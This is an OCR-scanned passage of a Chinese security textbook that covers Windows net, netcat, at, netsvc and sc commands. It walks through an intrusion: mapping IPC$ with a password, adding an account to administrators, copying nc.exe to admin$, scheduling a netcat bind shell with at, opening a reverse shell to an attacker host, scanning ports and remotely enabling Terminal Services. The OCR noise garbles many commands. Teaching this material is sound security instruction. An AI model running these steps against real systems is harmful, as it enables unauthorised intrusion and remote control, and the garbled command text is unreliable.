例如 , 若 要 将 192. 168. 168. 230 远程 主机 的 IPC $ 共享 资源 ,映射 为 本 地 主机 的 下 : 盘 ， 
则 操作 命令 为 : 


net use F: \\192. 168. 168. 230\ IPC $ 


@ 在 映射 网 络 磁盘 之 前 ,如 果 本 地 主机 与 目标 主机 之 间 的 IPCS$ 连 接 还 未 创建 , 则 映 
射 命令 为 : 
net use 本 地 盘 符 \\ip_adaress\ 共 享 资 源 名 "password" /user:" username" 


执行 该 命令 后 ,会 先 创建 所 需 的 IPC $ 连接 ,然后 再 进行 网 络 磁 盘 的 映射 。 

(3) 删除 磁盘 映射 

命令 : net use 网 络 盘 符 /delete 

例如 , 若 要 断 开 或 删除 映射 产生 的 FF 盘 , 则 实现 命令 为 : net use F; /delete。 

(4) 断 开 或 删除 IPC $ 连接 

断 开 或 删除 与 某 一 台 主 机 的 IPCS$ 连 接 ,实现 命令 为 : net use \\ ip_addressNipc $ /delete。 
若 要 断 开 或 删除 该 台 主 机 所 建立 的 所 有 IPC $ 连接 , 则 实现 命令 为 : net use * /delete。 


2.3 网 络 安全 检查 常用 命令 


下 面 主要 介绍 几 个 网 络 入 侵 和 网 络 安全 检查 常用 的 一 些 命令 的 功能 和 用 法 。 这 些 命令 
在 网 络 维护 管理 和 安全 检查 过 程 中 也 经 常 使 用 。 


2.3.1 net 命令 


net 是 Windows 系统 自 带 的 命令 ,其 功能 和 用 法 较 多 ,在 命令 行 中 执行 “net ?”, 可 获得 
有 关 该 命令 用 法 的 帮助 。 通 过 在 net 命令 后 面 选用 不 同 的 子 关 键 字 ,可 构成 不 同 的 net 命 
令 , 从 而 实现 不 同 的 功能 。 这 里 仅 介绍 几 个 常用 的 用 法 。 

1. net use 命令 

net use 命令 用 于 建立 和 管理 IPC $ 连接 ,并 可 实现 对 网 络 共享 资源 的 磁盘 映射 , 主要 
用 于 对 共享 资源 的 远程 访问 和 管理 。 

2. net user 命令 

net user 命令 用 于 对 本 地 主机 的 用 户 账户 进行 管理 ,可 实现 账户 的 添加 、 删 除 、 更 改 密 
码 、 更 改 用 户 所 属 的 用 户 组 等 操作 。 

(1) 查看 用 户 账户 列表 


命令 : net user 
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该 命令 用 于 查看 并 输出 当前 主机 的 用 户 账户 列表 。 正 常 的 处 于 激活 状态 的 账户 和 被 禁 
用 的 账户 都 将 被 显示 出 来 ,如 下 所 示 : 


C:\> net user 


\\WIN2K 的 用 户 账户 

Administrator Guest IUSR_WIN2K 
IWAM WIN2K TsInternetUser 

命令 成 功 完成 。 


(2) 查看 账户 的 属性 
若 要 查看 账户 的 属性 (比如 了 人 解 账户 是 否 被 禁用 、 账 户 所 属 的 用 户 组 ) ,其 实现 命令 为 ， 


net user username 


例如 , 若 要 查看 TsInternetUser 账户 的 属性 信息 , 则 实现 命令 为 : net user TsInternetUser 
命令 执行 的 结果 及 显示 信息 如 下 所 示 : 


C:\> net user TsInternetUser 


用 户 名 TsInternetUser 
全 名 TsInternetUser 
注释 

用 户 的 注释 

国家 (地 区 ) 代 码 000 (系统 默认 值 ) 
账户 启用 No 

账户 到 期 从 不 

上 次 设置 密码 2010-6-18 11:50 
密码 到 期 2010-7-31 10:38 
密码 可 更 改 2010-6-18 11:50 
需要 密码 Yes 

用 户 可 以 更 改 密码 Yes 

允许 的 工作 站 All 

登录 脚本 

用 户 配置 文件 

主 目录 

上 次 登录 从 不 

可 允许 的 登录 小 时 数 All 

本 地 组 成 员 x Users 

全 局 组 成 员 x None 
命令 成 功 完成 。 


根据 输入 信息 中 的 "账户 启用 ?项 的 当前 值 为 "No” ,可知 该 账户 目前 被 禁用 ,属于 Users 
用 户 组 的 成 员 。 

(3) 激活 或 禁用 账户 

激活 账户 ,实现 命令 为 : net user username /active:yes 

禁用 账户 ,实现 命令 为 : net user username /active:no 

例如 ,车 要 通过 命令 行 激活 TsInternetUser 账户 , 则 实现 命令 为 : net user TsInternetUser/ 
active: yes 
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执行 该 命令 后 , 若 输 出 的 提示 信息 为 “命令 成 功 完成 ”, 则 命令 执行 成 功 。 

(4) 设置 账户 密码 

命令 : net user account _ name password 

例如 ,车 要 设置 Guest 账户 的 密码 为 letmein , 则 实现 命令 为 : net user guest letmein 
(5) 创建 新 账户 

命令 : net user new_username password /add 


例如 , 若 要 创建 一 个 名 为 IS_WPG 的 用 户 账户 ,密码 设置 为 letmein, 则 实现 命令 为 : 
net user IIS WPG letmein /add 

(6) 将 账户 添加 到 指定 的 用 户 组 

命令 : net localgroup group_name username /add 

例如 ,车 要 将 IIS_WPG 用 户 添 加 到 administrators 用 户 组 , 则 实现 命令 为 : 

net localgroup administrators IIS_WPG /add 

(7) 查看 用 户 组 的 用 户 成 员 列表 

命令 : net localgroup group_name 

例如 , 若 要 查看 administrators 用 户 组 的 成 员 列 表 , 则 实现 命令 为 : 


net localgroup administrators 


命令 执行 后 的 输出 结果 如 下 所 示 : 


C:\> net localgroup administrators 

别名 administrators 

注释 ”管理 员 对 计算 机 / 域 有 不 受 限制 的 完全 访问 权 
成 员 


Administrator 
IIS_WPG 


命令 成 功 完成 。 
3. net share 命令 
Windows 操作 系统 默认 共享 了 很 多 资源 .net share 命令 可 用 于 实现 对 共享 资源 的 


(1) 查看 共享 资源 
命令 : net share 
利用 该 命令 可 查看 当前 系统 所 共享 的 网 络 资源 。 命 令 执 行 后 的 输出 信息 如 下 所 示 : 


C:\> net share 


共享 名 资源 注释 
IPC$ 远程 IPC 
ADMIN $ C:VWINNT 远程 管理 
D$ D:\ 默认 共享 
c$ cN 默认 共享 
命令 成 功 完成 
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(2) 删除 共享 资源 
命令 : net share sharename /delete 


例如 , 若 要 删除 admin $ 共享 资源 , 则 实现 的 操作 命令 为 : 


C:\> net share admin $ /delete 


admin $ 已 经 删除 。 

(3) 开启 共享 资源 

对 于 Windows 默认 的 共享 资源 ,删除 或 取消 共享 后 ,可 使 用 net share 命令 重新 开启 ， 
其 命令 格式 为 : 

net share sharename 


例如 , 若 要 重新 开启 admin$ 共 享 资源 , 则 实现 的 操作 命令 为 : 


C:\> net share admin $ 


admin $ 共享 成 功 。 

4. net 命令 对 服务 的 控制 

(1) 查看 当前 系统 已 启动 的 网 络 服务 

命令 : net start 

执行 该 命令 后 ,将 以 列表 的 形式 显示 输出 当前 已 启动 的 网 络 服务 的 名 称 。 

(2) 停止 指定 的 服务 

命令 : net stop service_name 

service_name 代表 要 停止 的 网 络 服务 的 服务 名 称 。 若 服务 名 称 之 间 有 空格 ,要 用 引号 
将 服务 名 称 括 起 来 。 例 如 , 若 要 停止 Task Scheduler 服务 , 则 实现 的 操作 命令 为 : 

C:\> net stop "Task Scheduler" 


Task Scheduler 服务 正在 停止 。 
Task Scheduler 服务 已 成 功 停止 。 


若 要 停止 IS 的 Web 服务 , 则 实现 的 操作 命令 为 ， 


C:\> net stop w3svc 
World Wide Web Publishing Service 服务 正在 停止 。 
World Wide Web Publishing Service 服务 已 成 功 停止 。 


若 要 停止 IIS 的 FTP 服务 , 则 实现 的 操作 命令 为 : 


C:\> net stop msftpsvc 
FTP Publishing Service 服务 正在 停止 。 
FTP Publishing Service 服务 已 成 功 停止 。 


(3) 启动 指定 的 服务 
命令 : net start service_name 


例如 ,车 要 重新 启动 Web 服务 , 则 实现 的 操作 命令 为 : 


C:\> net start w3sve 
World Wide Web Publishing Service 服务 正在 启动 。 
World Wide Web Publishing Service 服务 已 经 启动 成 功 。 
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5. net time 命令 

该 命令 用 于 查看 远程 目标 主机 的 当前 时 间 , 并 可 实现 将 本 地 主机 的 时 间 设 置 为 与 远 
程 目 标 主机 的 时 间 同 步 。 执 行 该 命令 之 前 ,本 地 主机 与 目标 主机 之 间 应 先 建立 起 IPC $ 
连接 。 

在 对 远程 目标 主机 设置 计划 执行 任务 之 前 ,通常 应 先 查 看 目标 主机 的 当前 时 间 ,以 方便 
确定 计划 任务 的 执行 时 间 。 

(1) 查看 目标 主机 的 当前 时 间 

命令 : net time \\ ip_address 


例如 , 若 要 查看 远程 目标 主机 (192. 168. 168. 230) 的 当前 时 间 , 则 实现 的 操作 命令 为 : 

C:\> net use NN192.168.168.230Nipc $ letmein /user:administrator 

命令 成 功 完 成 。 

C:\> net time \\192. 168. 168.230 

\\192. 168.168. 230 的 当前 时 间 是 2010 - 6 - 18 15:42 

命令 成 功 完成 。 

(2) 设置 本 地 主机 的 时 间 与 远程 目标 主机 的 时 间 同 步 

命令 :net time \\ip_address /set /yes 

参数 说 明 : 若 命 令 中 带 上 “/yes" 参 数 , 则 将 直接 设置 为 同步 ,不 会 显示 询问 是 否 调整 为 
一 致 的 对 话 信息 。 

例如 , 若 要 将 本 地 主机 的 时 间 设 置 为 与 192. 168. 168. 230 主机 的 时 间 同 步 , 则 实现 的 操 
作 命 令 为 : 

C:\> net time NN192.168.168.230 /set 

\\192.168.168.230 的 当前 时 间 是 2010- 6 - 18 15:45 


当前 本 地 时 间 2010 -6-18 15:41 
是 否 将 本 地 计算 机 的 时 间 与 \\192.168.168. 230 调整 为 一 致 ? (Y/N) [Y]: Y 


命令 成 功 完成 。 
2.3.2 nc 命令 


netcat( 简 称 为 nc) 是 一 个 命令 行 工 具 , 能 建立 TCP 或 UDP 连接 ,并 能 通过 该 连接 读 写 
数据 。 通 过 其 “-e” 参 数 ,可 将 Shell 程序 绑 定 到 本 地 机 的 指定 端口 或 者 绑 定 到 指定 主机 的 指 
定 端口 ,实现 后 门 木 马 类 似 的 功能 。ne 功能 十 分 强大 ,被 誉 为 网 络 安全 界 的 “瑞士 军刀 ”, 可 
在 Windows 平台 运行 ,也 可 在 Linux/UNIX 平台 运行 。 

nc 命令 参数 项 较 多 ,执行 带 “-h" 参 数 的 nc 命令 ,可 获得 nc 命令 的 用 法 和 各 参数 项 的 功 
能 说 明 。 

1. nc 命令 用 法 

nc 命令 的 基本 用 法 有 以 下 两 种 。 


用 法 1: nc [options] hostname port[s] [ports] .. 


用 法 2; nc -1 -p port [options] [ hostname] [ port ] 
用 法 1 用 于 远程 连接 目标 主机 的 指定 端口 ,实现 对 目标 主机 的 远程 登录 连接 ,相当 于 
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telnet 程序 的 功能 。 用 法 2 中 的 1” 参数 让 nc 命令 工作 在 侦 听 (监听 ) 模 式 , 可 用 于 侦 听 本 
地 机 的 指定 端口 或 侦 听 指定 主机 的 指定 端口 。 在 用 法 2 的 基础 上 ,如 果 再 结合 使 用 “-e” 参 
数 项 ,可 实现 将 指定 的 Shell 程序 (cmd. exe 或 Linux 系统 的 /bin/sh) 绑 定 到 指定 的 端口 。 
绑 定 成 功 后 ,用 户 通过 远程 登录 连接 该 端口 , 即 可 获得 远程 主机 的 Shell, 从 而 实现 对 远程 主 
机 的 控制 。 此 时 的 nc 命令 ,可 起 到 后 门 木 马 程序 的 功能 。 

options 参数 项 及 功能 说 明 如 下 。 

-d 使 用 后 台 模 式 运行 。 

-e prog 程序 重 定 向 。prog 代表 被 重 定向 的 程序 ,通常 为 Shell 程序 。 该 参数 项 功能 
强大 ,使 用 较 危 险 。 

-g gateway 网 关 源 路 由 模式 的 跳 数 .最 多 为 8。 

-G num 源 路 由 模式 的 节点 个 数 ,一般 为 4、8、12、…。 

-h 帮助 信息 。 

-i secs 在 端口 扫描 时 ,用 于 设置 延 时 的 间隔 ,单位 为 秒 。 

-| 监听 模式 ,用 于 入 站 连接 。 

-L 连接 关闭 后 ,仍然 继续 监听 。 

-n ”使 用 数字 形式 的 IP 地 址 。 

-o file 使 用 十 六 进 制 记录 数据 流 (hex dump of traffic) 。 

-p por 指定 监听 的 本 地 端口 号 。 

-r 随机 使 用 本 地 和 远程 主机 的 端口 号 。 

-saddr 指定 本 地 源 地 址 。 

-u 使 用 UDP 传输 模式 。 若 nc 命令 中 未 使 用 该 参数 , 则 建立 连接 默认 使 用 TCP 协议 。 

-v 显示 详细 信息 。 使 用 -vv, 可 显示 更 详细 的 信息 。 

-w secs 设置 网 络 连接 或 网 络 读 取 超时 的 时 间 (timeout for connects and final net 
reads) ,单位 为 秒 。 

-z I/O 模式 ,扫描 时 使 用 。 

2. nc 命令 用 法 示例 

在 本 案 列 中 ,假设 本 地 机 的 IP 地 址 为 192. 168. 6. 72, nc. exe 程序 可 执行 文件 位 于 
F:\hacktool 文件 夹 中 。 远 程 主机 为 192. 168. 6.73, 没 有 安装 IIS 的 Web 服务 ,nc. exe 程序 
已 复制 到 远程 主机 的 C:\。 

(1) 将 Shell 程序 绑 定 到 某 指定 的 端口 ,实现 开启 Shell 后 门 。 

通过 将 远程 主机 的 Shell 程序 绑 定 到 某 指 定 的 端口 ,可 实现 在 目标 主机 上 开启 后 门 的 
功能 ,以 方便 入 侵 者 远程 登录 连接 到 目标 主机 。 

假设 将 192. 168. 6. 73 主机 的 Shell 程序 绑 定 到 TCP 80 端口 , 则 实现 的 操作 命令 为 : 


nc -vv -1 -p80 -e cmd. exe 


执行 该 命令 后 ,其 输出 和 显示 结果 如 图 2. 6 所 示 。 

该 命令 在 192. 168. 6. 73 的 远程 主机 上 执行 ,执行 成 功 后 即 开 启 了 一 个 侦 听 服务 ,其 侦 
听 端 口 为 TCP 80, 以 后 客户 端 只 要 登录 连接 远程 主机 的 TCP 80 端口 成 功 ,就 会 被 重 定向 
到 cmd. exe 这 个 Shell 程序 ,从 而 就 可 获得 远程 主机 的 Shell。 
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:nc -vv -1 -p 88 -e cnd.exe 


在 监听 [任何 一 个 < 多 个 >] 88 ... 


图 2.6 将 Shell 绑 定 到 TCP 80 端口 


远程 主机 的 Shell 绑 定 成 功 后 , 接 下 来 在 客户 端 就 可 使 用 nc 命令 或 telnet 程序 来 登录 
连接 远程 主机 的 多 u LI, X 可 获得 远程 主机 的 Shell 了 
在 IP 地 址 为 192. 168. 6. 72 的 本 地 主机 的 命令 行 执行 以 下 命令 : 


F:\hacktool > nc 192. 168. 6.73 80 


命令 执行 成 功 后 ,就 可 获得 IP 地 址 为 192. 168. 6. 73 的 远程 主机 的 Shell 命令 行 ,如 
图 2.7 所 示 。 通 过 该 命令 行 就 可 实现 对 远程 主机 的 人 


m 命令 提示 符 - nc 192.168.6.73 80 


F:Shacktool>nc 192. .73 88 
icrosoft Windows 2i Version 5.88.2195] 
CO 版 权 所 有 1985-1998 Microsoft Corp. 


Va 


图 2.7 利用 nc 命令 连接 到 远程 主机 并 获得 Shell 命令 行 


若 使 用 telnet 程序 来 登录 连接 , 则 操 

从 图 2. 7 可 见 ,nc 命 令 登 录 连 接 成 功 后 ,成 功 获得 了 远程 主机 的 Shell 命令 行 。 在 该 
命令 行 操作 和 在 远程 主机 的 本 地 命令 行 操作 完全 等 效 。 此 时 远程 主机 就 被 客户 端 所 
控制 。 

在 远程 主机 执行 nc 命令 时 ,由 于 选用 了 “-vv” 参 数 ,因此 将 显示 相关 的 详细 信息 ,如 
图 2.8 所 示 。 


= 命令 为 : telnet 192. 168. 6.73 80 


Ë INDOWS\System32\cmd.exe -nc -vv -1-p 80 -e cmd.exe 


C:\nc -vv -1 -p 88 -e cnd.exe 
个 >] 89 


图 2.8 服务 端 输出 的 连接 信息 
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在 所 获得 的 远程 Shell 的 命令 行 中 执行 exit 命令 结束 Shell 之 后 ,服务 端的 Shell 绑 定 
也 将 同时 被 终止 。 另 外 ,在 实际 入 侵 使 用 中 ,为 了 隐蔽 ,通常 是 不 选用 *-v” 或 “vv” 参数 的 ， 
此 时 Shell 绑 定 命令 执行 后 ,是 不 会 输出 任何 信息 的 


(2) 使 用 反 向 连接 方式 ,获得 远程 主机 的 Shell 命令 行 
首先 ,攻击 者 在 自己 的 计算 机 上 (192. 168. 6. 72) 对 指定 的 端口 (如 TCP 8080) 进 行 监 


听 。 其 实现 命令 为 nc -vv -1 -p8080, 命 令 执行 


后 的 Shell 界面 如 图 2. 9 所 示 。 
-nc -w -| -p 8080 


F: Shacktool>nc -vv -1 -p 8880 
在 监听 [任何 一 个 (多 个 21 888@ ... 


图 2.9 在 攻击 者 的 主机 上 对 指定 的 端口 进行 监听 


然后 在 被 攻击 的 主机 的 命令 行 执行 nc 命令 ,将 其 Shell 程序 绑 定 到 攻击 者 主机 的 监 
听 端 口 。 其 实 


图 2.10 所 示 


现 命令 为 nc - e cmd. exe 192.168.6.72 8080 ,命令 执行 后 的 Shell 界面 如 


WINDOWS\ System32'icmd.exe - nc -e 1 


:Vne -e cmd.exe 192.168.6.72 8080 


图 2. 10 将 Shell 程序 绑 定 到 指定 主机 的 指定 端口 
在 被 攻击 者 的 主机 将 Shell 程序 绑 定 到 指定 端口 后 ,攻击 者 就 可 立 旧 


获得 被 攻击 者 的 
Shell 命 令 行 了 ,如 图 2. 11 所 示 


= = msj 


监听 [任何 一 个 《多 个 >】 888@ ... 
到 | [192.168.6.72] 来 自 WIN2K-4687BGJNR [192.168.6.73] 1048 


KO 版 权 所 有 1985-1998 Microsoft Corp. 


图 2.11 通过 反 向 连接 获得 被 攻击 者 的 Shell 命令 行 


G) 扫描 检查 远程 主机 的 某 端口 
命令 用 法 ，ne -vv - 
参数 说 明 


端口 范围 是 否 开启 


z — w secs ip_address port_range 
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secs 为 访问 端口 超时 的 时 间 ; ip_address 代表 要 扫描 检查 的 远程 主机 的 IP Hb hb; 
port_range 为 要 检查 的 端口 范围 或 某 个 指定 的 端口 。 

例如 , 若 要 检查 IP 地 址 为 192. 168. 6. 73 的 远程 主机 的 TCP 445 号 端口 是 否 开 放 , 则 
实现 的 操作 命令 为 : 

F:\hacktool >nc -vv -z -w 2 192.168.6.73 445 

WIN2K - 4607BGJNR [192.168. 6.73] 445 (microsoft - ds) 打开 

发 送 0, = 接受 0 

命令 执行 后 ,输出 信息 中 的 “打开 ?说 明 目 标 主机 开启 了 TCP 445 号 端口 。 若 输出 的 信 
息 为 “连接 被 拒绝 ”, 则 目标 主机 未 开启 该 端口 。 

车 要 扫描 检查 192. 168. 6. 73 主机 的 100 一 1023 号 端口 的 开放 情况 , 则 实现 的 命令 为 : 


nc -vwv -z -w2192.168.6.73 100 - 1023 


2.3.3 at 命令 


在 与 被 攻击 主机 建立 成 功 IPC $ 连接 后 ,可 利用 copy 命令 将 nc. exe 复制 到 目标 主机 ， 
然后 通过 在 被 攻击 的 主机 上 执行 nc 命令 ,来 实现 开启 Shell 后 门 。 现 在 问题 的 关键 是 如 何 
才能 实现 在 远程 目标 主机 上 执行 nc 命令 呢 ? 

为 此 ,可 利用 at 命令 ,在 远程 目标 主机 上 开启 一 个 计划 执行 任务 ,让 其 系统 在 指定 的 时 
间 自 动 执行 nc 命令 ,以 开启 Shell 后 门 。 使 用 计划 执行 任务 开启 的 进程 ,是 以 System 账户 
的 权限 运行 的 。at 命令 要 在 IPC $ 连接 已 创建 成 功 的 情况 下 ,才能 成 功 地 在 远程 主机 上 添 
加 “计划 执行 任务 ”。 从 中 可 见 ,为 防止 攻击 者 利用 “计划 执行 任务 "执行 任何 程序 ,提高 系统 
的 安全 性 ,可 在 系统 的 服务 管理 中 禁用 “计划 执行 任务 "task scheduler) 服 务 。 

要 利用 at 命令 开启 计划 执行 任务 (作业 ) ,远程 主机 的 “task scheduler" 服 务必 须 运行 ， 
否则 无 法 开启 计划 执行 任务 ,执行 at 命令 将 不 会 成 功 ,此 时 将 显示 “服务 尚未 启动 "的 提示 
信息 。 

车 用 户主 机 的 计划 执行 任务 服务 没有 启动 .攻击 者 也 可 能 会 使 用 netsvc. exe 工具 软件 
来 远程 开启 目标 主机 的 “task scheduler" 服 务 。 因 此 ,最 好 是 禁用 该 项 服务 ,而 不 是 停 用 该 
项 服务 。 


1. at 命令 用 法 
at [NN ip_address ] [ [ id] [/delete] | /delete [/yes]] 


at [NN ip_address ] time [/interactive] [ /every: date[,...] | /next: date[,...]] "command" 


参数 说 明 : 

ip_address 为 要 添加 计划 执行 任务 的 主机 的 IP 地 址 。 该 参数 默认 为 在 本 地 主机 上 
添加 。 

id 是 用 于 设置 该 计划 任务 运行 的 进程 的 进程 号 .为 可 选项 。 其 下 可 选 参数 : 

° /delete 删除 id 参数 指定 的 计划 任务 。 若 未 指定 id 参数 , 则 删除 所 有 已 排 定 的 计划 

任务 ; 
。 /yes 删除 所 有 已 排 定 的 计划 任务 时 ,直接 删除 ,不 显示 删除 确认 的 交互 信息 。 
time 设置 计划 任务 执行 的 时 间 。 其 下 可 选 参数 : 
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° /interactive 允许 计划 任务 在 运行 时 与 用 户 交 互 ; 
。 /every:date[....] 设置 在 每 周 或 每 月 的 某 日 (或 某 几 日 ) 自动 执行 "command" 参 数 
指定 的 命令 。 若 不 添加 日 期 , 则 默认 为 在 每 月 的 本 日 运行 ; 
。 /next;date[....] 设置 在 下 一 个 指定 的 日 期 自动 执行 "comzzzazcd "参数 指定 的 命令 。 
2. 用 法 示例 
现 要 求 在 192. 168. 6. 73 主机 上 添加 一 项 计划 执行 任务 ,3min 之 后 自动 执行 “nc -1 -p 
8080 -e cmd. exe” 命 令 , 则 实现 的 操作 命令 为 


F:\hacktool > net use \\192.168.6.73\ipc $ letmein /user:administrator 


命令 成 功 完成 。 


F :\hacktool > copy nc. exe \\192. 168.6. 73\admin $ 
已 复制 1 个 文件 

F :\hacktool > net time \\192. 168. 6.73 
\\192.168.6.73 的 当前 时 间 是 2010/6/19 10:06:30 


命令 成 功 完成 

F :\hacktool > at NN192.168.6.73 10:09:00 nc -1 - p 8080 - e cmd. exe 

新 加 了 一 项 作业 ,其 作业 ID = 1. 

10:09 分 这 个 时 间 过 了 之 后 ,nc 命令 就 被 自动 执行 了 。 之 后 ,就 可 在 攻击 者 的 主 
机 的 命令 行 执行 nc 192.168.6.73 8080 命令 来 登录 连接 192. 168. 6. 73 主机 所 打开 的 Shell 
后 门 ,如 图 2. 12 所 示 


而 SSIR -nc 192.168.673 8080 
IF: Shacktoo1>nc 192.168.6.73 8888 

icrosoft Windous 2000 [Version 5.00.2195] 
kc》 版 权 所 有 1985-1998 Microsoft Corp. 


:WINDOVS\systen32> 


图 2.12 获得 远程 主机 的 Shell 命令 行 


获得 远程 主机 的 Shell 后 ,就 相当 于 获得 了 对 远程 主机 的 控制 权 , 通 过 执行 命令 ,可 实 
现 所 需 的 操作 。 例 如 ,添加 隐藏 的 克隆 账户 .安置 永久 后 门 木马 .获取 用 户 数据 资料 等 。 


2.3.4 netsvc 与 sc 命令 


1，netsvec 命令 

netsvc 是 一 个 可 用 于 对 远程 主机 的 网 络 服务 进行 控制 管理 的 工具 软件 。 在 执行 netsvc 
命令 之 前 ,应 先 创建 好 IPC$ 连接 

(1) 查询 指定 服务 的 运行 状态 

车 要 查询 了 解 远 程 主机 的 某 个 服务 的 运行 状态 ,可 使 用 带 “/query” 参 数 项 的 netsvc 命 
令 来 实现 ,其 命令 用 法 为 : netsvc service_name \\ip_address /query 
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例如 , 若 要 查询 192. 168. 6. 73 主机 的 “task scheduler” 服 务 的 运行 状态 , 则 操作 命令 和 
执行 结果 如 下 所 示 : 

F:\hacktool > netsve "task scheduler" \\192.168. 6.73 /auery 

Service is running on NN192. 168. 6.73 

根据 输出 信息 可 见 , 计 划 任 务 服务 目前 处 于 运行 状态 。 

(2) 停止 指定 服务 的 运行 

命令 用 法 : netsvc service_name \\ip address /stop 

例如 , 若 要 停止 192. 168. 6. 73 主机 的 “task scheduler” 服 务 , 则 操作 命令 为 : 

F:\hacktool > netsvc "task scheduler" \\192.168.6.73 /stop 

Service is pending stop on NN192.168. 6. 73 


F:\hacktool > netsvc "task scheduler" \\192.168.6.73 /query 
Service is stopped on \\192. 168. 6.73 


(3) 启动 指定 的 服务 

命令 用 法 : netsvc service_name \\ip address /start 

例如 , 若 要 启动 192. 168. 6. 73 主机 的 “task scheduler” 服 务 , 则 操作 命令 为 : 

F:\hacktool > netsvc "task scheduler" \\192.168.6.73 /start 

Service is pending start on \\192.168.6.73 

F:\hacktool > netsvc "task scheduler" \\192.168.6.73 /query 

Service is running on \\192. 168. 6. 73 

(4) 服务 的 暂停 与 继续 运行 

若 要 暂停 某 项 服务 的 运行 ,可 使 用 带 “/pause” 参 数 的 netsvc 命令 来 实现 ; 若 要 恢复 服 
务 继续 运行 , 则 使 用 带 “/continue” 参 数 的 netsvc 命令 来 实现 。 

2. sc 命令 

netsvc 命令 可 实现 对 远程 主机 的 服务 运行 状态 的 查询 .服务 的 启动 与 停止 等 管理 操作 ， 
但 无 法 设置 更 改 服务 的 启动 模式 (自动 .手工 或 禁用 ) 。sc 命令 具有 netsvc 命令 所 具有 的 功 
能 ,同时 还 能 对 服务 的 启动 类 型 进行 设置 修改 ,并 能 添加 或 删除 服务 ,功能 很 强大 ,可 实现 对 
服务 的 全 面 控制 和 管理 ,命令 参数 项 也 较 多 。 

(1) sc 命令 用 法 

命令 用 法 : sc \\ ip_address command service_name [option] 

参数 说 明 : 

\\ip_address 为 远程 主机 的 IP 地 址 ; service_name 为 要 操作 控制 的 服务 的 名 称 。 

command 为 命令 功能 关键 字 , 可 选 的 命令 关键 字 及 其 含义 如 下 所 示 。 


query 查询 服务 的 运行 状态 

queryex 查询 服务 的 扩展 状态 

start 启动 服务 

pause 暂停 服务 

interrogate Sends an INTERROGATE control request to a service 
continue 恢复 被 暂停 的 服务 的 运行 

stop 停止 服务 
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config 更 改 服务 的 配置 信息 

description 更 改 服务 的 描述 信息 

failure Changes the actions taken by a service upon failure 
qc 查询 服务 的 配置 信息 

qdescription 查询 服务 的 描述 信息 

qfailure Queries the actions taken by a service upon failure 
delete 从 注册 表 中 删除 一 个 服务 

create 创建 一 个 服务 ,并 注册 服务 到 注册 表 中 

control 向 服务 发 送 一 个 控制 信息 

sdshow 显示 服务 的 安全 描述 (security descriptor) 

sdset 设置 一 个 服务 的 安全 描述 (security descriptor) 


GetDisplayName ”获得 服务 的 显示 名 称 (DisplayName) 

GetKeyName 获得 服务 的 服务 名 称 (ServiceKeyName) 

EnumDepend 枚 举 服务 的 依存 关系 

当 command 关键 字 选 用 config 时 ,option 常用 的 参数 项 及 其 可 能 值 如 下 所 示 。 
start = <boot|system|auto| demand| disabled> 设置 服务 的 启动 类 型 


binPath = < BinaryPathName > 用 于 设置 服务 的 可 执行 文件 的 路 径 
depend = < Dependencies(separated by / (forward slash))> 设置 服务 的 依存 关系 
DisplayName = < display name > 设置 服务 的 显示 名 称 

obj = < AccountName | ObjectName > 设置 服务 的 登录 账户 名 称 
password = < password > 设置 服务 登录 账户 的 密码 


(2) sc 命令 用 法 示例 

D 查询 服务 的 运行 状态 。 

命令 用 法 : sc \\ip_address query service_name 

例如 , 若 要 查询 192. 168. 6. 73 主机 的 终端 服务 的 运行 状态 , 则 实现 的 操作 命令 为 : 


F:\hacktool > sc \\192.168. 6.73 query termservice 
SERVICE_ NAME: termservice 


TYPE : 10 WIN32_OWN_PROCESS 
STATE : 1 STOPPED 
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) 
WIN32 EXIT CODE : 1077 (0x435) 
SERVICE EXIT CODE: 0 (0x0) 
CHECKPOINT : 0x0 
WAIT HINT : 0x0 


根据 输出 信息 中 的 STATE 项 目的 值 ,可见 目 标 主机 的 终端 服务 处 于 停止 状态 。 
@ 查询 服务 的 配置 信息 。 

命令 用 法 : sc \\ip_address qc service_name 

例如 , 若 要 查询 192. 168. 6. 73 主机 的 终端 服务 的 配置 信息 , 则 实现 的 操作 命令 为 : 


F :\hacktool > sc NN192.168. 6.73 qc termservice 
[SC] GetServiceConf ig SUCCESS 
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SERVICE _NAME :termservice 
TYPE : 10 WIN32_OWN PROCESS 
START TYPE :4 DISABLED 
ERROR_CONTROL :1 NORMAL 
BINARY PATH NAME : C:\WINDOWS\ System32\termsrv. exe 
LOAD ORDER GROUP : 
TAG # 0 
DISPLAY NAME : Terminal Services 
DEPENDENCIES 


SERVICE_START NAME : LocalSystem 


根据 输出 信息 中 的 START_TYPE( 启 动 类 型 ) 项 目的 值 为 4(DISABLED) ,可知 目标 
主机 的 终端 服务 是 被 禁用 的 。 

@ 更 改 服务 的 启动 类 型 。 

命令 用 法 : sc \\ip_address config service_name start = < boot|system| auto| demand| disabled > 

例如 , 若 要 将 192. 168. 6. 73 主机 的 终端 服务 的 启动 类 型 设置 为 自动 启动 , 则 实现 的 操 
作 命令 为 : 

F:\hacktool > sc \\192.168. 6.73 config termservice start = auto 

[SC] ChangeServiceConfig SUCCESS 

在 表达 命令 时 要 注意 “start= "与 后 面 的 设置 值 Cauto) 之 间 要 保留 一 个 空格 ,否则 命令 
将 无 法 识别 。 根 据 命令 执行 后 的 提示 信息 ,服务 的 启动 类 型 更 改 成 功 。 下 面 重新 查询 该 服 
务 的 配置 信息 。 


F:\hacktool > sc \\192.168. 6.73 qc termservice 
[SC] GetServiceConfig SUCCESS 
SERVICE_ NAME: termservice 


TYPE : 10 WIN32_OWN_PROCESS 
START_TYPE : 2 AUTO_START 

ERROR_CONTROL : 1 NORMAL 

BINARY_PATH NAME : C: \WINDOWS\ System32\termsrv. exe 
LOAD_ORDER_GROUP 

TAG :0 

DISPLAY_ NAME : Terminal Services 

DEPENDENCIES 


SERVICE START NAME : LocalSystem 


根据 输出 信息 可 见 ,此 时 START_TYPE 的 值 变 为 2L(AUTO_START) ,成 功 设置 为 了 
自动 启动 。 

另外 ,如 果 START_TYPE 的 值 为 3(DEMAND_START), 则 说 明 该 项 服务 处 于 手动 
启动 类 型 。 

@ 启动 服务 。 

命令 用 法 : sc \\ip_address start service_name 

例如 , 若 要 启动 192. 168. 6. 73 主机 的 终端 服务 , 则 实现 的 操作 命令 为 : 

F:\hacktool > sc \\192.168. 6.73 start termservice 


SERVICE NAME: termservice 
TYPE : 10 WIN32_OWN_PROCESS 
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STRTE : 2 STRRT PENDING 
(NOT_STOPPABLE, NOT_ PAUSABLE, IGNORES_SHUTDOWN) 

WIN32 EXIT CODE :0 (0x0) 

